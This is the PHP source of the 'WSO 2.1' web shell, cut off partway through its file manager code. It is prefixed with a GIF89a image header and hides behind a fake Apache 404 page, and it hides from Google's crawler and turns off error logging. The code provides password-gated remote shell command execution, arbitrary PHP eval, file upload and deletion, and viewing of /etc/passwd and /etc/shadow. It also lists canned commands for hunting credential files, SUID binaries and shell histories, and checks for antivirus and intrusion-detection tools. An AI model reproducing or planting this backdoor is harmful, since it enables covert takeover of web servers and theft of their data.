GIF89a����!��������;
<?php
/* WSO 2.1 (Anon) */
/*Anonymous*/
$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
$color = "#00ff00";
$default_action = ′FilesMan′;
@define(′SELF_PATH′, __FILE__);
if( strpos($_SERVER[′HTTP_USER_AGENT′],′Google′) !== false ) {
header(′HTTP/1.0 404 Not Found′);
exit;
}
@session_start();
@error_reporting(0);
@ini_set(′error_log′,NULL);
@ini_set(′log_errors′,0);
@ini_set(′max_execution_time′,0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(′VERSION′, ′2.1′);
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map(′stripslashes_array′, $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER[′HTTP_HOST′]?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER[′HTTP_HOST′])] ))
if( empty( $auth_pass ) ||
( isset( $_POST[′pass′] ) && ( md5($_POST[′pass′]) == $auth_pass ) ) )
$_SESSION[md5($_SERVER[′HTTP_HOST′])] = true;
else
printLogin();
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = ′win′;
else
$os = ′nix′;
$safe_mode = @ini_get(′safe_mode′);
$disable_functions = @ini_get(′disable_functions′);
$home_cwd = @getcwd();
if( isset( $_POST[′c′] ) )
@chdir($_POST[′c′]);
$cwd = @getcwd();
if( $os == ′win′) {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != ′/′ )
$cwd .= ′/′;
if($os == ′win′)
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name "config*"",
"find config* files in current dir" => "find . -type f -name "config*"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate ′.conf′",
"locate .pwd files" => "locate ′.pwd′",
"locate .sql files" => "locate ′.sql′",
"locate .htpasswd files" => "locate ′.htpasswd′",
"locate .bash_history files" => "locate ′.bash_history′",
"locate .mysql_history files" => "locate ′.mysql_history′",
"locate .fetchmailrc files" => "locate ′.fetchmailrc′",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
function printHeader() {
if(empty($_POST[′charset′]))
$_POST[′charset′] = "UTF-8";
global $color;
?>
<html><head><meta http-equiv=′Content-Type′ content=′text/html; charset=<?=$_POST[′charset′]?>′><title><?=$_SERVER[′HTTP_HOST′]?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
<style>
body {background-color:#000;color:#fff;}
body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a { color:<?=$color?> !important; }
span { font-weight: bolder; }
h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
div.content { padding: 5px;margin-left:5px;}
a { text-decoration:none; }
a:hover { background:#ff0000; }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px; }
input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr(′<?=$_SERVER[′REQUEST_URI′];?>′, params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\d+)([\S\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style=′display:none;′>
<input type=hidden name=a value=′<?=isset($_POST[′a′])?$_POST[′a′]:′′?>′>
<input type=hidden name=c value=′<?=htmlspecialchars($GLOBALS[′cwd′])?>′>
<input type=hidden name=p1 value=′<?=isset($_POST[′p1′])?htmlspecialchars($_POST[′p1′]):′′?>′>
<input type=hidden name=p2 value=′<?=isset($_POST[′p2′])?htmlspecialchars($_POST[′p2′]):′′?>′>
<input type=hidden name=p3 value=′<?=isset($_POST[′p3′])?htmlspecialchars($_POST[′p3′]):′′?>′>
<input type=hidden name=charset value=′<?=isset($_POST[′charset′])?$_POST[′charset′]:′′?>′>
</form>
<?php
$freeSpace = @diskfreespace($GLOBALS[′cwd′]);
$totalSpace = @disk_total_space($GLOBALS[′cwd′]);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname(′r′);
$kernel = @php_uname(′s′);
$millink=′http://milw0rm.com/search.php?dong=′;
if( strpos(′Linux′, $kernel) !== false )
$millink .= urlencode( ′Linux Kernel ′ . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ′ ′ . substr($release,0,3) );
if(!function_exists(′posix_getegid′)) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid[′name′];
$uid = $uid[′uid′];
$group = $gid[′name′];
$gid = $gid[′gid′];
}
$cwd_links = ′′;
$path = explode("/", $GLOBALS[′cwd′]);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href=′#′ onclick=′g("FilesMan","";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].′/′;
$cwd_links .= "")′>".$path[$i]."/</a>";
}
$charsets = array(′UTF-8′, ′Windows-1251′, ′KOI8-R′, ′KOI8-U′, ′cp866′);
$opt_charsets = ′′;
foreach($charsets as $item)
$opt_charsets .= ′<option value="′.$item.′" ′.($_POST[′charset′]==$item?′selected′:′′).′>′.$item.′</option>′;
$m = array(′Sec. Info′=>′SecInfo′,′Files′=>′FilesMan′,′Console′=>′Console′,′Sql′=>′Sql′,′Php′=>′Php′,′Safe mode′=>′SafeMode′,′String tools′=>′StringTools′,′Bruteforce′=>′Bruteforce′,′Network′=>′Network′);
if(!empty($GLOBALS[′auth_pass′]))
$m[′Logout′] = ′Logout′;
$m[′Self remove′] = ′SelfRemove′;
$menu = ′′;
foreach($m as $k => $v)
$menu .= ′<th width="′.(int)(100/count($m)).′%">[ <a href="#" onclick="g(′′.$v.′′,null,′′,′′,′′)">′.$k.′</a> ]</th>′;
$drives = "";
if ($GLOBALS[′os′] == ′win′) {
foreach( range(′a′,′z′) as $drive )
if (is_dir($drive.′:\′))
$drives .= ′<a href="#" onclick="g(′FilesMan′,′′.$drive.′:/′)">[ ′.$drive.′ ]</a> ′;
}
echo ′<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd′.($GLOBALS[′os′] == ′win′?′<br>Drives′:′′).′</span></td>′.
′<td>:<nobr>′.substr(@php_uname(), 0, 120).′ <a href="http://www.google.com/search?q=′.urlencode(@php_uname()).′" target="_blank">[Google]</a> <a href="′.$millink.′" target=_blank>[milw0rm]</a></nobr><br>:′.$uid.′ ( ′.$user.′ ) <span>Group:</span> ′.$gid.′ ( ′.$group.′ )<br>:′.@phpversion().′ <span>Safe mode:</span> ′.($GLOBALS[′safe_mode′]?′<font color=red>ON</font>′:′<font color=<?=$color?><b>OFF</b></font>′).′ <a href=# onclick="g(′Php′,null,null,′info′)">[ phpinfo ]</a> <span>Datetime:</span> ′.date(′Y-m-d H:i:s′).′<br>:′.viewSize($totalSpace).′ <span>Free:</span> ′.viewSize($freeSpace).′ (′.(int)($freeSpace/$totalSpace*100).′%)<br>:′.$cwd_links.′ ′.viewPermsColor($GLOBALS[′cwd′]).′ <a href=# onclick="g(′FilesMan′,′′.$GLOBALS[′home_cwd′].′′,′′,′′,′′)">[ home ]</a><br>:′.$drives.′</td>′.
′<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">′.$opt_charsets.′</optgroup></select><br><span>Server IP:</span><br>′.gethostbyname($_SERVER["HTTP_HOST"]).′<br><span>Client IP:</span><br>′.$_SERVER[′REMOTE_ADDR′].′</nobr></td></tr></table>′.
′<table cellpadding=3 cellspacing=0 width=100%><tr>′.$menu.′</tr></table><div style="margin:5">′;
}
function printFooter() {
$is_writable = is_writable($GLOBALS[′cwd′])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
<tr>
<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS[′cwd′]);?>"><input type=submit value=">>"></form></td>
<td><form onsubmit="g(′FilesTools′,null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g(′FilesMan′,null,′mkdir′,this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
<td><form onsubmit="g(′FilesTools′,null,this.f.value,′mkfile′);return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
</tr>
<tr>
<td><form onsubmit="g(′Console′,null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method=′post′ ENCTYPE=′multipart/form-data′>
<input type=hidden name=a value=′FilesMAn′>
<input type=hidden name=c value=′<?=htmlspecialchars($GLOBALS[′cwd′])?>′>
<input type=hidden name=p1 value=′uploadFile′>
<input type=hidden name=charset value=′<?=isset($_POST[′charset′])?$_POST[′charset′]:′′?>′>
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
</tr>
</table>
</div>
</body></html>
<?php
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[′disable_functions′], ′posix_getpwuid′)===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[′disable_functions′], ′posix_getgrgid′)===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) {
$out = ′′;
if(function_exists(′exec′)) {
@exec($in,$out);
$out = @join("
",$out);
}elseif(function_exists(′passthru′)) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists(′system′)) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists(′shell_exec′)) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function viewSize($s) {
if($s >= 1073741824)
return sprintf(′%1.2f′, $s / 1073741824 ). ′ GB′;
elseif($s >= 1048576)
return sprintf(′%1.2f′, $s / 1048576 ) . ′ MB′;
elseif($s >= 1024)
return sprintf(′%1.2f′, $s / 1024 ) . ′ KB′;
else
return $s . ′ B′;
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = ′s′;
elseif (($p & 0xA000) == 0xA000)$i = ′l′;
elseif (($p & 0x8000) == 0x8000)$i = ′-′;
elseif (($p & 0x6000) == 0x6000)$i = ′b′;
elseif (($p & 0x4000) == 0x4000)$i = ′d′;
elseif (($p & 0x2000) == 0x2000)$i = ′c′;
elseif (($p & 0x1000) == 0x1000)$i = ′p′;
else $i = ′u′;
$i .= (($p & 0x0100) ? ′r′ : ′-′);
$i .= (($p & 0x0080) ? ′w′ : ′-′);
$i .= (($p & 0x0040) ? (($p & 0x0800) ? ′s′ : ′x′ ) : (($p & 0x0800) ? ′S′ : ′-′));
$i .= (($p & 0x0020) ? ′r′ : ′-′);
$i .= (($p & 0x0010) ? ′w′ : ′-′);
$i .= (($p & 0x0008) ? (($p & 0x0400) ? ′s′ : ′x′ ) : (($p & 0x0400) ? ′S′ : ′-′));
$i .= (($p & 0x0004) ? ′r′ : ′-′);
$i .= (($p & 0x0002) ? ′w′ : ′-′);
$i .= (($p & 0x0001) ? (($p & 0x0200) ? ′t′ : ′x′ ) : (($p & 0x0200) ? ′T′ : ′-′));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return ′<font color=#FF0000><b>′.perms(@fileperms($f)).′</b></font>′;
elseif (!@is_writable($f))
return ′<font color=white><b>′.perms(@fileperms($f)).′</b></font>′;
else
return ′<font color=#00BB00><b>′.perms(@fileperms($f)).′</b></font>′;
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p) {
$path = ex(′which ′.$p);
if(!empty($path))
return $path;
return false;
}
function actionSecInfo() {
printHeader();
echo ′<h1>Server security information</h1><div class=content>′;
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo ′<span>′.$n.′: </span>′;
if(strpos($v, "
") === false)
echo $v.′<br>′;
else
echo ′<pre class=ml1>′.$v.′</pre>′;
}
}
showSecParam(′Server software′, @getenv(′SERVER_SOFTWARE′));
showSecParam(′Disabled PHP Functions′, ($GLOBALS[′disable_functions′])?$GLOBALS[′disable_functions′]:′none′);
showSecParam(′Open base dir′, @ini_get(′open_basedir′));
showSecParam(′Safe mode exec dir′, @ini_get(′safe_mode_exec_dir′));
showSecParam(′Safe mode include dir′, @ini_get(′safe_mode_include_dir′));
showSecParam(′cURL support′, function_exists(′curl_version′)?′enabled′:′no′);
$temp=array();
if(function_exists(′mysql_get_client_info′))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists(′mssql_connect′))
$temp[] = "MSSQL";
if(function_exists(′pg_connect′))
$temp[] = "PostgreSQL";
if(function_exists(′oci_connect′))
$temp[] = "Oracle";
showSecParam(′Supported databases′, implode(′, ′, $temp));
echo ′<br>′;
if( $GLOBALS[′os′] == ′nix′ ) {
$userful = array(′gcc′,′lcc′,′cc′,′ld′,′make′,′php′,′perl′,′python′,′ruby′,′tar′,′gzip′,′bzip′,′bzip2′,′nc′,′locate′,′suidperl′);
$danger = array(′kav′,′nod32′,′bdcored′,′uvscan′,′sav′,′drwebd′,′clamd′,′rkhunter′,′chkrootkit′,′iptables′,′ipfw′,′tripwire′,′shieldcc′,′portsentry′,′snort′,′ossec′,′lidsadm′,′tcplodg′,′sxid′,′logcheck′,′logwatch′,′sysmask′,′zmbscap′,′sawmill′,′wormscan′,′ninja′);
$downloaders = array(′wget′,′fetch′,′lynx′,′links′,′curl′,′get′,′lwp-mirror′);
showSecParam(′Readable /etc/passwd′, @is_readable(′/etc/passwd′)?"yes <a href=′#′ onclick=′g("FilesTools", "/etc/", "passwd")′>[view]</a>":′no′);
showSecParam(′Readable /etc/shadow′, @is_readable(′/etc/shadow′)?"yes <a href=′#′ onclick=′g("FilesTools", "etc", "shadow")′>[view]</a>":′no′);
showSecParam(′OS version′, @file_get_contents(′/proc/version′));
showSecParam(′Distr name′, @file_get_contents(′/etc/issue.net′));
if(!$GLOBALS[′safe_mode′]) {
echo ′<br>′;
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam(′Userful′, implode(′, ′,$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam(′Danger′, implode(′, ′,$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam(′Downloaders′, implode(′, ′,$temp));
echo ′<br/>′;
showSecParam(′Hosts′, @file_get_contents(′/etc/hosts′));
showSecParam(′HDD space′, ex(′df -h′));
showSecParam(′Mount options′, @file_get_contents(′/etc/fstab′));
}
} else {
showSecParam(′OS Version′,ex(′ver′));
showSecParam(′Account Settings′,ex(′net accounts′));
showSecParam(′User Accounts′,ex(′net user′));
}
echo ′</div>′;
printFooter();
}
function actionPhp() {
if( isset($_POST[′ajax′]) ) {
$_SESSION[md5($_SERVER[′HTTP_HOST′]).′ajax′] = true;
ob_start();
eval($_POST[′p1′]);
$temp = "document.getElementById(′PhpOutput′).style.display=′′;document.getElementById(′PhpOutput′).innerHTML=′".addcslashes(htmlspecialchars(ob_get_clean()),"
\′�")."′;
";
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
if( isset($_POST[′p2′]) && ($_POST[′p2′] == ′info′) ) {
echo ′<h1>PHP info</h1><div class=content>′;
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(′!body {.*}!msiU′,′′,$tmp);
$tmp = preg_replace(′!a:w+ {.*}!msiU′,′′,$tmp);
$tmp = preg_replace(′!h1!msiU′,′h2′,$tmp);
$tmp = preg_replace(′!td, th {(.*)}!msiU′,′.e, .v, .h, .h th {$1}′,$tmp);
$tmp = preg_replace(′!body, td, th, h2, h2 {.*}!msiU′,′′,$tmp);
echo $tmp;
echo ′</div><br>′;
}
if(empty($_POST[′ajax′])&&!empty($_POST[′p1′]))
$_SESSION[md5($_SERVER[′HTTP_HOST′]).′ajax′] = false;
echo ′<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,′′);}return false;"><textarea name=code class=bigarea id=PhpCode>′.(!empty($_POST[′p1′])?htmlspecialchars($_POST[′p1′]):′′).′</textarea><input type=submit value=Eval style="margin-top:5px">′;
echo ′ <input type=checkbox name=ajax value=1 ′.($_SESSION[md5($_SERVER[′HTTP_HOST′]).′ajax′]?′checked′:′′).′> send using AJAX</form><pre id=PhpOutput style="′.(empty($_POST[′p1′])?′display:none;′:′′).′margin-top:5px;" class=ml1>′;
if(!empty($_POST[′p1′])) {
ob_start();
eval($_POST[′p1′]);
echo htmlspecialchars(ob_get_clean());
}
echo ′</pre></div>′;
printFooter();
}
function actionFilesMan() {
printHeader();
echo ′<h1>File manager</h1><div class=content>′;
if(isset($_POST[′p1′])) {
switch($_POST[′p1′]) {
case ′uploadFile′:
if(!@move_uploaded_file($_FILES[′f′][′tmp_name′], $_FILES[′f′][′name′]))
echo "Can′t upload file!";
break;
break;
case ′mkdir′:
if(!@mkdir($_POST[′p2′]))
echo "Can′t create new dir";
break;
case ′delete′:
function deleteDir($path) {
$path = (substr($path,-1)==′/′) ? $path:$path.′/′;
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST[′f′]))
foreach($_POST[′f′] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case ′paste′:
if($_SESSION[′act′] == ′copy′) {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.′/′,$f, $d.$s.′/′);
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION[′f′] as $f)
copy_paste($_SESSION[′cwd′],$f, $GLOBALS[′cwd′]);
} elseif($_SESSION[′act′] == ′move′) {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.′/′,$f, $d.$s.′/′);
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION[′f′] as $f)
@rename($_SESSION[′cwd′].$f, $GLOBALS[′cwd′].$f);
}
unset($_SESSION[′f′]);
break;
default:
if(!empty($_POST[′p1′]) && (($_POST[′p1′] == ′copy′)||($_POST[′p1′] == ′move′)) ) {
$_SESSION[′act′] = @$_POST[′p1′];
$_SESSION[′f′] = @$_POST[′f′];
foreach($_SESSION[′f′] as $k => $f)
$_SESSION[′f′][$k] = urldecode($f);
$_SESSION[′cwd′] = @$_POST[′c′];
}
break;
}
echo ′<script>document.mf.p1.value="";document.mf.p2.value="";</script>′;
}
$dirContent = @scandir(isset($_POST[′c′])?$_POST[′c′]:$GLOBALS[′cwd′]);
if($dirContent === false) { echo ′Can′t open this folder!′; return; }
global $sort;
$sort = array(′name′, 1);
if(!empty($_POST[′p1′])) {
if(preg_match(′!s_([A-z]+)_(d{1})!′, $_POST[′p1′], $match))
$sort = array($match[1], (int)$match[2]);
}
?>
<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == ′checkbox′)
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=′100%′ class=′main′ cellspacing=′0′ cellpadding=′2′>
<form name=files method=post>
<?php
echo "<tr><th width=′13px′><input type=checkbox onclick=′sa()′ class=chkbx></th><th><a href=′#′ onclick=′g("FilesMan",null,"s_name_".($sort[1]?0:1)."")′>Name</a></th><th><a href=′#′ onclick=′g("FilesMan",null,"s_size_".($sort[1]?0:1)."")′>Size</a></th><th><a href=′#′ onclick=′g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")′>Modify</a></th><th>Owner/Group</th><th><a href=′#′ onclick=′g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")′>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array(′name′ => $dirContent[$i],
′path′ => $GLOBALS[′cwd′].$dirContent[$i],
′modify′ => date(′Y-m-d H:i:s′,@filemtime($GLOBALS[′cwd′].$dirContent[$i])),
′perms′ => viewPermsColor($GLOBALS[′cwd′].$dirContent[$i]),
′size′ => @filesize($GLOBALS[′cwd′].$dirContent[$i]),
′owner′ => $ow[′name′]?$ow[′name′]:@fileowner($dirContent[$i]),
′group′ => $gr[
|
0 Items 
